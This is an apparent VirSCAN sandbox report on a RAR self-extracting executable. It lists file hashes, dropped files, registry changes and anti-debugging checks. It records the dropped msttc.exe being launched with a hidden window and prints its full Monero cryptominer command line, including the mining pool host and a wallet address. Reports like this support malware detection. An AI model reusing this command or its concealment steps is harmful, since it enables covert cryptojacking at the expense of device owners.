VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.

Language
Server load
Server Load

File information
Safety rating:72
Behavior list
Basic Information
MD5:34a34026c2dc76f766a611fbf61c9d49
file type:EXE
Production company:
version:
Shell or compiler information:COMPILER:Microsoft Visual Studio .NET 2005 -- 2008 -> Microsoft Corporation [RAR SFX] *
Subfile information:msttc.exe / 7c00d4b65f8fa21b4934f0f097a79cd0 / EXE
synclog.vbs / e905bfd580bd876da7054929912bf346 / Unknown
Key behavior
Behavior description:跨进程写入数据
details:TargetProcess = C:\Windows\System32\wscript.exe, WriteAddress = 0x00040000, Size = 0x00000020 TargetPID = 0x00000e08
TargetProcess = C:\Windows\System32\wscript.exe, WriteAddress = 0x00040020, Size = 0x00000034 TargetPID = 0x00000e08
TargetProcess = C:\Windows\System32\wscript.exe, WriteAddress = 0x7ffd6238, Size = 0x00000004 TargetPID = 0x00000e08
Behavior description:直接获取CPU时钟
details:EAX = 0x1666a168, EDX = 0x00000075
EAX = 0x1919a0e4, EDX = 0x00000075
EAX = 0x21076ecd, EDX = 0x00000075
EAX = 0x8cbf419d, EDX = 0x00000075
EAX = 0x8cbf41e9, EDX = 0x00000075
EAX = 0x8cbf4235, EDX = 0x00000075
EAX = 0x8f7241b1, EDX = 0x00000075
EAX = 0x8f7241fd, EDX = 0x00000075
EAX = 0x8f724249, EDX = 0x00000075
EAX = 0x8f724295, EDX = 0x00000075
Process behavior
Behavior description:隐藏窗口创建进程
details:ImagePath = C:\Users\Administrator\AppData\Local\%temp%\msttc.exe, CmdLine = "C:\Users\Administrator\AppData\Local\%temp%\msttc.exe" -a cryptonight -o stratum+tcp://pool.minexmr.com:80 -u 4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe.synclog -p x --donate-level=1 --max-cpu-usage=9
Behavior description:创建进程
details:[0x00000e08]ImagePath = C:\Windows\System32\wscript.exe, CmdLine = "C:\Windows\System32\WScript.exe" "C:\Users\Administrator\AppData\Local\%temp%\synclog.vbs"
Behavior description:跨进程写入数据
details:TargetProcess = C:\Windows\System32\wscript.exe, WriteAddress = 0x00040000, Size = 0x00000020 TargetPID = 0x00000e08
TargetProcess = C:\Windows\System32\wscript.exe, WriteAddress = 0x00040020, Size = 0x00000034 TargetPID = 0x00000e08
TargetProcess = C:\Windows\System32\wscript.exe, WriteAddress = 0x7ffd6238, Size = 0x00000004 TargetPID = 0x00000e08
File behavior
Behavior description:创建文件
details:C:\Users\Administrator\AppData\Local\%temp%\__tmp_rar_sfx_access_check_140453
C:\Users\Administrator\AppData\Local\%temp%\msttc.exe
C:\Users\Administrator\AppData\Local\%temp%\synclog.vbs
Behavior description:创建可执行文件
details:C:\Users\Administrator\AppData\Local\%temp%\msttc.exe
Behavior description:修改脚本文件
details:C:\Users\Administrator\AppData\Local\%temp%\synclog.vbs ---> Offset = 0
Behavior description:查找文件
details:FileName = C:\Users\Administrator\AppData\Local\%temp%\b70c.exe
FileName = C:\Users
FileName = C:\Users\Administrator\AppData
FileName = C:\Users\Administrator\AppData\Local
FileName = C:\Users\Administrator\AppData\Local\Temp
FileName = C:\Users\Administrator\AppData\Local\%temp%
FileName = C:\Users\Administrator\AppData\Local\%temp%\synclog.vbs
FileName = C:\Windows
FileName = C:\Windows\System32
FileName = C:\Windows\System32\WScript.exe
FileName = C:\Windows\System32\*.*
FileName = C:\Users\Administrator\AppData\Local\%temp%\msttc.exe
Behavior description:删除文件
details:C:\Users\Administrator\AppData\Local\%temp%\__tmp_rar_sfx_access_check_140453
Behavior description:修改文件内容
details:C:\Users\Administrator\AppData\Local\%temp%\msttc.exe ---> Offset = 0
C:\Users\Administrator\AppData\Local\%temp%\msttc.exe ---> Offset = 65536
C:\Users\Administrator\AppData\Local\%temp%\msttc.exe ---> Offset = 131072
C:\Users\Administrator\AppData\Local\%temp%\msttc.exe ---> Offset = 196608
C:\Users\Administrator\AppData\Local\%temp%\msttc.exe ---> Offset = 262144
Registry behavior
Behavior description:删除注册表键值
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
Other behavior
Behavior description:检测自身是否被调试
details:IsDebuggerPresent
Behavior description:创建互斥体
details:Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
Behavior description:隐藏指定窗口
details:[Window,Class] = [,ComboLBox]
[Window,Class] = [浏览(&W)...,Button]
[Window,Class] = [C:\Users\Administrator\AppData\Local\%temp%,ComboBox]
Behavior description:打开互斥体
details:DefaultTabtip-MainUI
Local\MSCTF.Asm.MutexDefault1
Behavior description:查找指定窗口
details:NtUserFindWindowEx: [Class,Window] = [EDIT,]
Behavior description:打开事件
details:HookSwitchHookEnabledEvent
\KernelObjects\MaximumCommitCondition
Local\MSCTF.CtfActivated.Default1
Local\MSCTF.AsmCacheReady.Default1
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
MSFT.VSA.COM.DISABLE.3592
MSFT.VSA.IEC.STATUS.6c736db0
Behavior description:可执行文件签名信息
details:C:\Users\Administrator\AppData\Local\%temp%\msttc.exe(签名验证: 未通过)
Behavior description:可执行文件MD5
details:C:\Users\Administrator\AppData\Local\%temp%\msttc.exe ---> 7c00d4b65f8fa21b4934f0f097a79cd0
Behavior description:直接获取CPU时钟
details:EAX = 0x1666a168, EDX = 0x00000075
EAX = 0x1919a0e4, EDX = 0x00000075
EAX = 0x21076ecd, EDX = 0x00000075
EAX = 0x8cbf419d, EDX = 0x00000075
EAX = 0x8cbf41e9, EDX = 0x00000075
EAX = 0x8cbf4235, EDX = 0x00000075
EAX = 0x8f7241b1, EDX = 0x00000075
EAX = 0x8f7241fd, EDX = 0x00000075
EAX = 0x8f724249, EDX = 0x00000075
EAX = 0x8f724295, EDX = 0x00000075
Run screenshot
VirSCAN

About VirSCAN | Privacy Policy | Contact us | Links | Help VirSCAN
Powered By CentOSpol

京ICP备11007605号-12

pol

京公网安备 11010802020746号